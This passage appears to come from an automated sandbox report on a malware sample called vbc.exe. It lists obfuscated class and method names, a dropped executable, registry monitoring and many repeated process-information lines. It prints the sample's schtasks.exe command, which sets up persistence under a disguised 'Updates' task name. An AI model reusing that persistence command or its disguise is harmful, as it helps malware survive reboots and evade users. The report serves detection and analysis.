Source: 8.0.vbc.exe.d10000.7.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.9.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.9.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.9.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.9.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.9.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.9.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.9.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.3.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.3.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.3.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.3.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.3.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.3.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.3.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.2.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.2.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.2.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.2.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.2.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.2.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.2.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\vbc.exe File created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
